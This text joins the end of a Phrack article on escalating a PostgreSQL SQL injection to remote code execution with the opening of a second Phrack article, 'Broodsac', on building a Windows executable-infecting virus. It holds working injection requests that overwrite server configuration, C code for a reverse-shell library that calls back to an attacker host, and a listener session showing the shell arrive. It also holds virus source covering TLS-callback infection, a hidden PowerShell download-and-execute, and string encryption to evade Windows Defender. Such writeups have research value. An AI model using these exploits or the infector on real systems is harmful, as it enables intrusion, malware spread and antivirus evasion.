indicate our success. Let's check our permissions again:
--------------------------------------------------------------------------
postgres=# \x
Expanded display is on.
postgres=# SELECT * FROM pg_authid WHERE rolname='poc_user';
-[ RECORD 1 ]--+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | t
rolinherit | t
rolcreaterole | t
rolcreatedb | t
rolcanlogin | t
rolreplication | t
rolbypassrls | t
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
--------------------------------------------------------------------------
Success! All "rol" flags were flipped to true! Can we reload the config
now?
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[
{"id":1337,"text":"true"}
]
--------------------------------------------------------------------------
Notice that this query now returns a row with "text" set to "true",
confirming that we are indeed able to reload the config. That's more like
it! We can now move on to the SELECT-only RCE.
--[ 4 - SELECT-only RCE
---[ 4.0 - Reading original postgresql.conf
The first step in performing the RCE is to download the original config
file. Since we are a super-admin now, we can query its path directly from
the "pg_file_settings" view without any extra path-guessing effort:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, sourcefile FROM pg_file_settings"
[
{"id":1337,"text":"/etc/postgresql/13/main/postgresql.conf"}
]
--------------------------------------------------------------------------
Let's download it with the help of previously used Large Object functions:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_import('/etc/postgresql/13/main/postgresql.conf', 3333331337)) AS text)"
[
{"id":1337,"text":"3333331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,translate(encode(lo_get(3333331337), 'base64'), E'\n', '')" | jq ".[].text" -r | base64 -d > postgresql.conf
--------------------------------------------------------------------------
---[ 4.1 - Choosing a parameter to exploit
There are several known options that can already be used for an RCE:
- ssl_passphrase_command (by Denis Andzakovic[5])
- archive_command (by sylsTyping[6])
But are any other parameters worth looking into?
--------------------------------------------------------------------------
$ cat postgresql.conf
...
# - Shared Library Preloading -
#local_preload_libraries = ''
#session_preload_libraries = ''
#shared_preload_libraries = '' # (change requires restart)
...
# - Other Defaults -
#dynamic_library_path = '$libdir'
--------------------------------------------------------------------------
These parameters specify libraries to be loaded dynamically by the DBMS
from the path specified in the "dynamic_library_path" variable, under
specific conditions. That sounds promising!
We will focus on the "session_preload_libraries" variable, which dictates
what libraries should be preloaded by the server on a new connection[11].
It does not require a restart of the server, unlike
"shared_preload_libraries", and does not have a specific prefix prepended
to the path like the "local_preload_libraries" variable.
So, we can rewrite the malicious postgresql.conf to have a writable
directory in the "dynamic_library_path", e.g. /tmp, and to have a
rogue library filename in the "session_preload_libraries", e.g.
"payload.so".
The updated config file will look like this:
--------------------------------------------------------------------------
$ cat postgresql.conf
...
# - Shared Library Preloading -
session_preload_libraries = 'payload.so'
...
# - Other Defaults -
dynamic_library_path = '/tmp:$libdir'
--------------------------------------------------------------------------
---[ 4.2 - Compiling the malicious library
One of the final steps is to compile a malicious library for the server to
load. The code will naturally vary depending on the OS the DBMS is running
under. For the Unix-like case, let's compile the following simple reverse
shell into an .so file. The "_init()" function will automatically fire on
library load:
--------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "postgres.h"
#include "fmgr.h"
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
void _init() {
/*
code taken from https://www.revshells.com/
*/
int port = 8888;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("172.23.16.1");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
}
--------------------------------------------------------------------------
Notice the presence of the "PG_MODULE_MAGIC" field in the code. It is
required for the library to be recognized and loaded by the PostgreSQL
server.
Before compilation, we must install the proper PostgreSQL development
packages for the correct major version - 13 in our case:
--------------------------------------------------------------------------
$ sudo apt install postgresql-13 postgresql-server-dev-13 -y
--------------------------------------------------------------------------
The code can be compiled with gcc with the following command:
--------------------------------------------------------------------------
$ gcc \
-I$(pg_config --includedir-server) \
-shared \
-fPIC \
-nostartfiles \
-o payload.so \
payload.c
--------------------------------------------------------------------------
---[ 4.3 - Uploading the config and library to the server
With the updated config file and compiled library on our hands, it is time
to upload and overwrite everything on the target DBMS host.
Uploading and replacing the postgresql.conf file:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(3331333337, decode('$(base64 -w 0 postgresql_new.conf)', 'base64'))) AS text)"
[
{"id":1337,"text":"3331333337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(3331333337, '/etc/postgresql/13/main/postgresql.conf')) AS text)"
[{"id":1337,"text":"1"}]
--------------------------------------------------------------------------
Uploading the malicious .so file:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(33313333337, decode('$(base64 -w 0 payload.so)', 'base64'))) AS text)"
[
{"id":1337,"text":"33313333337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(33313333337, '/tmp/payload.so')) AS text)"
[{"id":1337,"text":"1"}]
--------------------------------------------------------------------------
If everything is correct, we should see the updated config and .so file in
place:
--------------------------------------------------------------------------
# .so library
=== target server ===
ubuntu@ubuntu-virtual-machine:/tmp$ md5sum payload.so
0a240596d100c8ca8e781543884da202 payload.so
=== attacker server ===
$ md5sum payload.so
0a240596d100c8ca8e781543884da202 payload.so
# postgresql.conf
=== target server ===
ubuntu@ubuntu-virtual-machine:~$ md5sum /etc/postgresql/13/main/postgresql.conf
480bb646f178be2a9a2b609b384e20de /etc/postgresql/13/main/postgresql.conf
=== attacker server ===
$ md5sum postgresql_new.conf
480bb646f178be2a9a2b609b384e20de postgresql_new.conf
--------------------------------------------------------------------------
---[ 4.4 - Reload successful
We are all set. Now for the moment of glory! A quick config reload and we
get a reverse shell back from the server.
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[
{"id":1337,"text":"true"}
]
--------------------------------------------------------------------------
On the attacker host:
--------------------------------------------------------------------------
$ nc -lvnp 8888
Listening on 0.0.0.0 8888
Connection received on 172.23.16.1 53004
id
uid=129(postgres) gid=138(postgres) groups=138(postgres),115(ssl-cert)
pwd
/var/lib/postgresql
--------------------------------------------------------------------------
--[ 5 - Conclusions
In this article, we managed to escalate the impact of a seemingly very
restricted SQL injection to a critical level by recreating DELETE and
UPDATE statements from scratch via direct modification of the DBMS files
and data, and we developed a novel technique for escalating user
permissions along the way!
Excessive server file read/write permissions can be a powerful tool in
the wrong hands. There is still much to discover with this attack vector,
but I hope you've learned something useful today.
Cheers,
adeadfed
--[ 6 - References
[0] https://github.com/gin-gonic/gin
[1] https://github.com/jackc/pgx
[2] https://github.com/jackc/pgx/issues/1090
[3] https://github.com/postgres/postgres/blob/2346df6fc373df9c5ab944eebecf7d3036d727de/src/backend/tcop/postgres.c#L1468
[4] https://www.postgresql.org/docs/current/lo-funcs.html
[5] https://pulsesecurity.co.nz/articles/postgres-sqli
[6] https://thegrayarea.tech/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3
[7] https://www.postgresql.org/docs/9.4/functions-admin.html
[8] https://www.postgresql.org/docs/current/storage-hot.html
[9] https://www.postgresql.org/docs/current/storage-page-layout.html
[10] https://github.com/adeadfed/postgresql-filenode-editor
[11] https://postgresqlco.nf/doc/en/param/session_preload_libraries/
[12] https://www.manniwood.com/2020_12_21/read_pg_from_go.html
--[ 7 - Source code
base64 -w 75 sources.tar.gz
H4sIAAAAAAAAA+w9a3MaubL7mV+hm1QtsCEYMA/HFacK20NMLQYfwNnkel1TAwgzm2GGMzPE9u7
mv99uaTQjzcNgJ+s9dw+qVAx6dLe6pVa31BIrx/NvXOr923o9Ny1qOzP6ms5M33H3fvheqQKp1W
rg32qrUZH/ivRDtd5oNar7jVqj9kOl2mi1qj+Qxnej4IG09nzDJeSH9WRt++sH6m0o/3+aVtny7
3VPtP5IKy9n34gDBdxs1rPkX.................................
........................
..................[please see original file for source code in entirety]...........................
............................................................................
===========================================================
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x09 of 0x11
|=-----------------------------------------------------------------------=|
|=--------------------------=[ Broodsac ]=-------------------------------=|
|=-----=[ A VX Adventure in Build Systems and Oldschool Techniques ]=----=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Amethyst Basilisk ]=------------------------=|
|=-----------------------------------------------------------------------=|
--[ Table of Contents
1. Introduction
2. Planning the Virus
3. Designing the Virus
4. Building the Virus
5. Dealing with Development Hazards
5.1. The Original Design Fails
5.2. Antivirus Catches It
6. Conclusions
7. Shouts
8. References
9. Artifacts
--[ 1. Introduction
There is nothing more thrilling than a successful payload. But in the
pursuit of payloads, we are susceptible to dopamine addiction. And in
that addiction, we seek shortcuts to get our hit. Indeed, the urgency of
speed requires us to hunt these shortcuts as well. Just use bash glue.
Don't worry about code maintainability. I have the compiler, why make
things more complicated?
It is easy to forget when pursuing our dark arts-- from viral writing to
exploitation-- that in everything we do, we are creating software. And
software gets complicated. Certainly, for shellcoding, it is merely a one-
liner with NASM to create a binary blob of your creation. That's not
complicated at all. But isn't the shellcode going somewhere? C won't let
you simply merge binary blobs into your code. (Not until C23, anyway.)
And it's not always as easy as concatenating your creation onto your
executable. What if you want to encrypt the shellcode somehow? And what
if another program has to handle that shellcode? And that program might
be the payload of another program in the chain! This doesn't even begin
to consider what automation your assembly payload might require, such as
dynamic obfuscation.
Our dark arts are a mess of project management-- payload factories,
matryoshka obfuscation, a plethora of moving parts necessitating
cleverness. It is not to say our quick hacks are not worthy of their
purpose-- they are. But they are more often than not optimized for speed,
not interoperability, maintainability or portability. A good build system,
by sometimes sacrificing short-term speed of development, provides these
things.
Unix users are already familiar with this. One of the oldest build
systems, GNU Make and the autotools suite, is fundamental to sharing
and building code on Unix-like platforms. Windows users, however, don't
have this culture. Everything is Visual Studio projects. And like
everything Windows, the MSVC build system is a veritable black box
behind the Visual Studio IDE. The hackers who can wield MSVC's black
magic to their whim have undoubtedly inspired us with their mindblowingly
assembled payloads. Lord knows I would love to see SmokeLoader's build
system[10].
You can think of this article as a cooking recipe. While the virus
technique used here is nowhere near novel ("roy g biv already did it"),
it is wrapped in techniques and best practices to build any type of virus.
We will cover the use of a robust build system to construct our virus and
discuss techniques for build systems that bolster our malware development.
We will also be covering some techniques necessary to circumvent Windows
Defender, as this is now the baseline we must develop against.
To follow along, grab a copy of Visual Studio with C++ support, CMake
(https://cmake.org) and NASM for Windows (https://nasm.us). To fully
understand this article, you are expected to have a basic understanding
of PE files.
--[ 2. Planning the Virus
We want to write an executable infector for Windows. To do that, we need
to break down the moving pieces involved in an executable infector. While
traditional executable infectors have gone out of style due to advances
in executable security, it can still be done-- especially with the advent
of developers being unable to afford, or care about, signing their
binaries. (Hello, Rust!)
(Hello, Rust!)
At the outset in the abstract, we have two pieces: the *infector* and
the *infection*. The *infector* is obviously responsible for infecting
executables it finds. The *infection* is simply whatever payload we want
to inject into various executables. Already, we have a dependency to work
with: naturally, the *infector* relies on the *infection* in the build
system, somehow. We want the infection to be flexible and portable so
it's as easy as possible to inject into executables. Shellcoding fits
this purpose perfectly.
For writing quality shellcode, we stick with the C-then-ASM philosophy
of writing our payload. In Broodsac, we have opted to let the compiler's
optimizer work on our C code, and then hand-translate the result into an
assembly file.
While this can get tedious as the shellcode grows, we luckily don't
have to worry about traditional requirements of shellcode as it comes to
exploitation, since we're targeting an executable, not an exploitable
buffer. Therefore, we have relatively few limits. Additionally, because
Windows-- being the dinosaur it is-- still supports both 32-bit and
64-bit binaries, the 32-bit architecture remains relevant. So payloads
for both architectures will be necessary.
At the outset of our plan, our virus hierarchy looks like this:
+ broodsac
+ infection
+ ASM
+ 32
+ 64
+ C
The infection is purely a necessity of the infector, and as such, should
be contained within its directory as a dependency. We should provide
ourselves some external ability to compile the assembly payloads into
their own binary for testing purposes. This means, in the abstract, we
have roughly four binaries to work with-- the infector, the 32-bit ASM,
the 64-bit ASM, and the C payload. Our infector should rely only on the
assembly payloads, so we know we should somehow connect these pieces at
the outset to our infector build.
Having the projects individually separated this way makes the moving
pieces easier to manage. Disaster, so to speak, is relatively contained
to the individual units, organized and in their place. From the outside--
especially when accustomed to a hack-fast lifestyle-- you would not be
blamed for seeing this organization as mere masturbation. Again, why
bother when I can just stick everything in the same folder and issue
compilation commands where I deem fit?
Demons lurk in your code. That's why. They will snap out and pull you
under when you least expect it, splashing red on your screen, spewing
Stroustrup's nightmare inheritance, demanding refactoring for your sinful
C. Being organized and compartmentalized in your endeavors gives you the
territorial high ground in the battle of bugs. Being prepared for
something to go wrong turns these demons into mere irritants.
Constructing a build system around your virus exposes the pain-points
when and where things go wrong, allowing you to quickly and elegantly
attend to the problem. It also acts as a functional, engineerable glue
to wrap around your build. The more complex your virus gets, the more a
solid build system becomes essential, freeing us from the chains of
uncreative compiler corporations.
--[ 3. Designing the Virus
We now have the abstract design of all the pieces of our virus. Next we
need to fill in the blanks! We have two questions we need to answer:
+ How should our virus infect the executable?
+ What should our viral payload do?
The first question was answered initially-- naively-- with code caves and
PE file entrypoint redirection. Entrypoint redirection is a technique as
old as EXE infections[1]. Unfortunately, code caves in executables are
rarely large enough to hold the beast that is a Windows shellcode. On
average, you get around 200 bytes: suitable for a Linux shellcode, not
very good for a Windows one.
After some thinking, TLS directory injection[2] was settled upon. The TLS
directory-- or Thread Local Storage-- is one of many directories within a
PE file. It is responsible for ultimately managing thread memory storage
tactics within the given executable. A notable trait of the TLS directory
is initialization callbacks. There can be many, and they're iteratively
called on process startup. In other words, the TLS directory takes
precedence over the main routine, as the TLS directory initialization is
part of the PE loading process. Remember this last part-- it will bite us
in the ass later.
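To see these callbacks for yourself, you can dump a binary's TLS callback
array in a few lines of Python with the third-party pefile module-- a
rough sketch, with an illustrative path, assuming a reasonably recent
pefile:

  import pefile

  pe = pefile.PE('target.exe')  # path is illustrative
  if hasattr(pe, 'DIRECTORY_ENTRY_TLS'):
      va = pe.DIRECTORY_ENTRY_TLS.struct.AddressOfCallBacks
      pe32plus = pe.OPTIONAL_HEADER.Magic == 0x20b
      read_ptr = pe.get_qword_at_rva if pe32plus else pe.get_dword_at_rva
      rva = va - pe.OPTIONAL_HEADER.ImageBase
      while True:
          callback = read_ptr(rva)
          if not callback:
              break  # the callback array is NULL-terminated
          print('TLS callback at VA %#x' % callback)
          rva += 8 if pe32plus else 4
  else:
      print('no TLS directory present')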
There is a matter of how our TLS section gets inserted into the binary.
We have simply opted to insert a new section, as we can provide a
guarantee that the section will be executable and writable, as opposed
to containing other metadata such as program resources. If we wanted to
be stealthier about the infection, we could control for executable
sections and apply the 29A technique[3] of expanding the last section
in the executable. Naturally, the trade-off for stealth here is a reduced
potential attack surface and-- perhaps intentionally-- an increased
complexity of detecting the infection. The power is yours.
We want executable targets. Where do we find them? Surprisingly, in the
user's home directory. Gone are the days of every program installing
itself in the Program Files directory; now is the dawn of AppData and the
user's document folder where they unzip various packages of unsigned
executables. We can simply recursively iterate the user's home directory
for targets.
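As an illustration of the sweep (and a handy way to census a test
machine), a rough Python equivalent of the target hunt could look like
this-- walk the home directory and collect writable .exe files:

  import os

  home = os.path.expanduser('~')
  targets = []
  for root, dirs, files in os.walk(home):
      for name in files:
          path = os.path.join(root, name)
          # candidate targets: executables we are allowed to rewrite
          if name.lower().endswith('.exe') and os.access(path, os.W_OK):
              targets.append(path)
  print('%d candidate executables' % len(targets))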
As for what it should do on infection? I'm a particular fan of the
Desktop Pet project[4], formerly known as eSheep in the 90s. An
appropriate payload to send up an infection technique from the 90s.
It provides a great visual if the payload executes for testing purposes.
Our payload should simply download (if the file doesn't exist) and execute
this cute little sheep onto the user's desktop. Who would oppose such
adorable software augmenting executables with a delightful animal friend?
A simple download-exec of this payload will be perfect.
--[ 4. Building the Virus
Quick and dirty, to build Broodsac, uudecode the artifacts in section 9
to get the tarball, extract it, and run the following:
$ cd broodsac
$ mkdir build
$ cd build
$ cmake ../ -A x64
$ cmake --build ./ --config Release
Naturally, I am assuming you won't be foolish enough to run the result on
a system you don't want tampered with. Unless you *want* sheep friends in
your executables, then by all means.
While you are building your virus, you are undoubtedly going to encounter
bugs. Considering we are building software, we should borrow from
software's philosophy of creating and performing tests. These do not have
to be formal unit tests, per se, where functionality is verified at
individual code points, but they should somehow test the functionality
of your virus. Considering the volatility of the undefined behavior of
targets we work with in our dark development, you should absolutely
build with tests in mind at the forefront.
There are three key questions we need to consider for our testing
purposes:
+ Does the payload work?
+ Does the infector successfully infect?
+ Does the infection succeed without disrupting original execution?
The first question has an actionable task for us: how do we test this?
Naturally, we don't have to do it programmatically-- we simply need to run
the payload in its many forms to see if it successfully launches a cute
little sheep. C and Assembly have various development pitfalls that will
become apparent during this simple testing process. To build and test our
64-bit payload, for example, we can simply do this:
$ cd infection/asm/64
$ mkdir build
$ cd build
$ cmake ../ -DINFECTION_STANDALONE=ON -A x64
$ cmake --build ./ --config Release
$ ./Release/infection_asm_64.exe
If our payload succeeds, we are rewarded with a cute little sheep.
A simple test.
This is similar to the configure/make process on Linux. CMake takes the
CMakeLists.txt in the target directory and builds the configuration for
the compilation tools necessary to perform a build. We have
configured our ASM files to be compilable as either standalone binaries
for individual testing, or as static libraries to be included with the
infector binary.
A static library was chosen as the method of merging our payloads into our
binary because it's simple and elegant, since the payload's architecture
will match. Instinctively, we see shellcode as a unit to be stored away,
to be converted to a hex string and stashed away in some C code. So we
wind up doing creative things with it, as to us, it is merely a blob of
data to be wrangled into something. We tend to forget that the shellcode
can be its own individual code unit.
But with a build system on your side, you can augment the way your
shellcode comes out at the compilation stage. After doing various build
customizations to our shellcode payload, in our infector binary's CMake
file, we include this and the 32-bit version this way:
add_subdirectory(${PROJECT_SOURCE_DIR}/infection/asm/32)
add_subdirectory(${PROJECT_SOURCE_DIR}/infection/asm/64)
add_executable(broodsac WIN32 main.c)
target_link_libraries(broodsac infection_asm_32 infection_asm_64)
In a rather clean way, with a simple set of "extern" keywords in the
infector's main.c file, we have included our shellcode payloads into the
main binary. While not shown yet, in addition to this process, we have
managed to automate a step of encrypting the strings within the payload
code, so every time our build is executed, the strings are re-encrypted
and re-assembled in the infector executable.
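Broodsac's actual mechanism is not reproduced here, but the shape of such
a build step can be sketched in a few lines of Python: pick a fresh
single-byte XOR key on every build and emit a NASM include for the
payload's decryption stub to reference. All names in the sketch are
hypothetical:

  import os

  # hypothetical pre-build step: re-encrypt a payload string each build
  plain = b'https://example.com/sheep.exe\x00'
  key = os.urandom(1)[0] | 1           # single-byte key, never zero
  enc = bytes(b ^ key for b in plain)

  with open('strings.inc', 'w') as f:
      f.write('%%define STRING_KEY 0x%02x\n' % key)
      f.write('encrypted_url: db %s\n'
              % ', '.join('0x%02x' % b for b in enc))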
We have avoided the tedium of manually converting our shellcode into an
array of some kind and even added an obfuscation step along the way.
The beauty of this method is that it avoids the unseen hazards that tend
to spring up from the speedy solutions we're used to. And at the end of
the day: it's just good software development practice.
Let's get back to our questions. The other questions, while having the
same action item, have a more complicated answer. We need to test and
analyze the infected executables to verify and debug infections. So we
need to enumerate what we need to test based on our design intent.
Because we're dealing with the TLS directory, we are dealing primarily
with *virtual addresses*, as opposed to RVA and offsets. Virtual addresses
tend to imply the need for relocations within the binary. This is
absolutely something we need to deal with as an executable infector-- with
the ubiquity of Address Space Layout Randomization (aka /DYNAMICBASE),
we would be stupid to not consider modifying the relocation directory of
a target executable in the case of infection.
Thus, we have four states of configuration to test infection against:
+ no tls directory present, no relocation directory present
+ no tls directory present, relocation directory present
+ tls directory present, no relocation directory present
+ tls directory present, relocation directory present
In addition to this, we need to consider targeting the 32-bit architecture
as well, creating a total of 8 binary configurations to test against! This
brings the total number of code projects in our virus to 12. With a good
build system, we can construct all these test binaries rather easily:
$ cd infectables
$ mkdir build32 build64
$ cd build32
$ cmake ../ -A Win32
$ cd ../build64
$ cmake ../ -A x64
The build scripts can basically follow a folder hierarchy and build
multiple projects contained within, which is what's happening here.
We now have two configured build environments-- one for 32-bit and one
for 64-bit.
$ cd build32
$ cmake --build ./ --config Release
$ cd ../build64
$ cmake --build ./ --config Release
This will place all the binaries in the Release directory within the
build environment. They can then be targeted for infection by our
infector executable for testing purposes. Just as with a compiler at the
command line, we can pass various switches to define CMake cache variables.
We can configure our infector to be aware of a directory containing our
infectable executables:
$ mkdir build
$ cd build
$ cmake -DBROODSAC_DEBUG=ON -DBROODSAC_INFECTABLES="infectables" \
-A x64 ../
This command configures Broodsac in debug mode. Rather than
targeting the user's home directory, it will instead target the infectable
directory, where our test programs are currently built. By running
Broodsac in this state, we can easily verify the state of infection and
its corresponding payload. And this is of utmost importance-- the demons
that hit the hardest, lurk the lowest. Robust testing will help to
eradicate them.
--[ 5. Dealing with Development Hazards
The result of the virus you see here is a labor of love, of many hours
spent debugging, testing, verifying, fixing and refactoring. But when
you see the final product, what you don't see are those little steps
along the way that ultimately built the product before you. So it's hard
to appreciate the struggle, the fight that comes with software
development. It is, for the most part, an individual journey that
everyone who writes code wanders on.
It is very easy to laugh at a good, terrible bug. It amazes us when stupid
bugs seem to have a persistent lifetime, just waiting to be discovered by
the next lucky actor. But bugs are part of the life-cycle of software,
whether exploitable or not, and as you cannot escape the gravitational
pull of software development as a virus writer, you may as well embrace
its best practices.
This section focuses on two pivotal points of critical failure in the
process of developing this virus: a point when an initial payload idea
failed at the last minute, and the point when antivirus seemed to start
detecting our infections.
--[ 5.1 The Original Design Fails
Do you remember when I said the TLS directory would come back to bite us
in the ass? How did having a robust build system help us with that?
Originally, our payload was a very simple, sensible program: import
GetFileAttributes, URLDownloadToFileA and ShellExecuteA. This would
essentially be all we needed to download our sheep and run it on the
target system. To help explain the chaos we mitigated, let's break down
the steps we need to generate and test our final product, the infector:
1. compile the C infection
2. test the C infection
3. translate to assembly on 32-bit and 64-bit architectures
4. compile the assembly (2x)
5. test the assembly (2x)
6. incorporate the shellcode into our infector
7. compile the infector
8. test the infector
9. verify the infections succeed
When we fully enumerate the steps needed to build a sound virus, we can
appreciate the simplification a build system provides to a complex
ecosystem. At any given step in this process, something can fail, and
when it does, we have to restart from some earlier point. The more time
it takes to resume where we failed, the
more time that is wasted. And not being clear from an organizational
standpoint where you need to go to restart is a time waster. A good build
system saves you time, a very precious resource.
In this case, it was discovered that ShellExecuteA and URLDownloadToFileA
were failing all the way at step 9. Ass status: bitten. And look at when
it chose to bite us-- testing, rather than deployment. What bit us?
Our infection technique of TLS injection.
In choosing to perform TLS injection on the binary, we were tempted by
the fact that we get precedence over the entrypoint of the infected
executable. But this means we're executing in the context of the
executable loader, which means our infected executable is not yet fully
loaded. In particular to our conundrum, *threads* are not yet fully
initialized. It was observed that when ShellExecuteA and
URLDownloadToFileA were executed within the context of a TLS directory
callback, they would hang. It was noted, too, that the process attempted
to create a thread before it hung. This likely meant we could not use any
functions which wound up spawning threads.
The payload was changed to something slightly less conventional:
CreateProcessA. While not unconventional for our payload program, the way
we eventually went about downloading the payload certainly was.
CreateProcessA eventually calls NtCreateProcess, a function of ntdll.dll
which ultimately culminates in a kernel syscall. This would undoubtedly
be thread-safe in our TLS directory. So how did we eventually download
our payload? A call to Powershell.
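While the final version lives in the assembly payloads, the shape of it
is easy to sketch in C. This is a sketch only: MSVC-specific TLS
registration, error handling omitted, and the command string taken from
the build script shown later:
#include <windows.h>
/* Everything here runs before the host's entrypoint, inside the loader,
   so nothing may depend on fully initialized threads. For an EXE you may
   also need /INCLUDE:_tls_used so the TLS directory gets emitted. */
static void NTAPI tls_payload(PVOID module, DWORD reason, PVOID reserved)
{
    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    char cmd[] = "powershell -ExecutionPolicy bypass -WindowStyle hidden "
        "-Command \"(New-Object System.Net.WebClient).DownloadFile("
        "'https://amethyst.systems/sheep.dat','C:\\ProgramData\\sheep.exe')\"";
    if (reason != DLL_PROCESS_ATTACH)
        return;
    /* CreateProcessA bottoms out in kernel syscalls rather than spawning
       a thread in *our* process, so it doesn't hang under the loader. */
    if (CreateProcessA(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW,
                       NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
}
/* MSVC idiom for registering a TLS callback at compile time. */
#pragma section(".CRT$XLB", read)
__declspec(allocate(".CRT$XLB"))
PIMAGE_TLS_CALLBACK p_tls_payload = tls_payload;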
Certainly goofy for a shellcode payload to make an external call to
Powershell when the API is at your fingertips, isn't it? Such is the nature
of hacking-- when faced with a challenge, we heed the call with non-
standard solutions, in spite of our opinions, when they simply work.
Nonetheless, this solution required a significant rewrite of the code.
The C payload would need to be rewritten, recompiled, translated into
assembly, those assembly files compiled, and stuck back into our infector.
Essentially, we are forced to go back to the beginning of our steps
enumerated and work our way back to our infector. That's a lot of time, and
even more steps to take without the simplification provided by a build
system!
But with everything glued together, the only time we are wasting is simply
the equivalent of raking the sand in our zen garden: coding and analyzing.
All because our build system makes our complicated abstract verification
steps relatively mindless:
$ cd infection/c/build
$ cmake --build ./
$ ./Debug/infection_c.exe # any sheep? try again
$ cmake --build ./ --config Release # for translating to asm
$ cd ../../asm/32/build
$ cmake --build ./
$ ./Debug/infection_asm_32.exe # any sheep? try again
$ cd ../../64/build
$ cmake --build ./
$ ./Debug/infection_asm_64.exe # any sheep? try again
$ cd ../../../../build # footgun: are you debug configured?
$ cmake --build ./
$ ./Debug/broodsac.exe # at least you just get sheep if you footgun
Every step where something could functionally go wrong is isolated into
its own place, manageable in their own regards. Each action we need to
create our virus, from payload to delivery, is instrumented and flows
smoothly between one another. When something goes wrong at any point in
this chain, we know exactly where to restart, and can quickly act and
tackle the issue.
It's one thing to be agile when it comes to mitigating the demons of bugs,
though, but what of the demons of emergency feature requests? It is not
merely the push of management that inspires such spikes in development,
but surprise necessity.
--[ 5.2 Antivirus Catches It
It was incredibly amusing to me when I noticed the sheep being detected as
malware. Curious, because the sheep itself was technically benign-- the
infector and the infection were actually the malware. Initially, I
whitelisted it in Windows Defender while I was working and didn't really
think anything of it-- I'd fix it later. Eventually, I had to face the
music and figure out why my virus was being detected, even if the sheep
was curiously benign.
The hints we were receiving from Windows Defender were that it was some
kind of script that triggered it, and that the signature it was hitting
on was called "Trojan:Script/Wacatac.B!ml". Some research on the signature
told us absolutely nothing, as procedurally generated signatures are wont
to do. It did manage to tell us that everyone is pissed that all sorts of
random benign executables were being flagged as Wacatac. We're being taken
down by a false positive? Positively embarrassing.
Anyway, with the script hint, it seemed clear that it was triggering
on our Powershell one-liner. I didn't even bother to obfuscate the command
in any way whatsoever, so it's no wonder it got caught in the end. We
later confirmed thanks to some Windows Defender signature research[5]
that our download string was absolutely in there, somewhere, so surely
this was the culprit. This means, now, we would have to obfuscate it.
Sure, we could just do it one-and-done and hardcode it into the assembly
files, but where's the fun in that? They'll just flag the encrypted blob
and call it a day! Where's the flexibility in that? And what if I need to
change the eventual command entirely? How can I make this as painless as
possible for me and others who want to transform this code?
The beauty of a good build system is an ability to humbly offload build
commands to another process at specific points in the build. Let's look
at the code in our payloads which encrypts the strings:
add_custom_command(TARGET infection_asm_64
PRE_BUILD
COMMAND powershell ARGS
-ExecutionPolicy bypass
-File "${CMAKE_CURRENT_SOURCE_DIR}/../strings.ps1"
-payload_program "\\??\\C:\\ProgramData\\sheep.exe"
-payload_command "sheep"
-download_program "\\??\\C:\\Windows\\System32\\WindowsPowerShell\
\\v1.0\\powershell.exe"
-download_command "powershell -ExecutionPolicy bypass \
-WindowStyle hidden \
-Command \"(New-Object System.Net.WebClient).DownloadFile(\
'https://amethyst.systems/sheep.dat', 'C:\\ProgramData\\sheep.exe')\""
-output "${CMAKE_CURRENT_BINARY_DIR}/$<CONFIG>/infection_strings.asm"
VERBATIM)
Powershell was chosen simply because it's easier to work with than the
oldschool CMD. A simple script was created which transforms the many
strings we need to encrypt: it chooses a random key, then does the
traditional xor-encrypt on each string. The script produces a NASM include
file and dumps it into the binary directory of the build system--
essentially the catch-all directory for any generated artifacts. We then
include that directory in the assembler directives so our assembly files
can see it:
target_include_directories(infection_asm_64 PUBLIC
"${CMAKE_CURRENT_SOURCE_DIR}"
"${CMAKE_CURRENT_BINARY_DIR}/$")
As creatives whose canvas is questionable machine code, we can no doubt
see the attractiveness and capability that this brings. If you're really
feeling saucy, you can even mutate COFF objects and incorporate them with
specific library configurations via CMake as well! Mucking around with
object files directly would look something like this:
add_library(obfuscateme STATIC obfu.c)
add_custom_command(TARGET obfuscateme
PRE_LINK COMMAND obfuscate ARGS
"${CMAKE_CURRENT_BINARY_DIR}/obfuscateme.dir/$/obfu.obj")
add_executable(virus main.c)
target_link_libraries(virus obfuscateme)
What these four commands wind up doing is compiling a set of
functionality that needs to be obfuscated, calling the obfuscator on our
compiled object file, which is then reincorporated into our build process
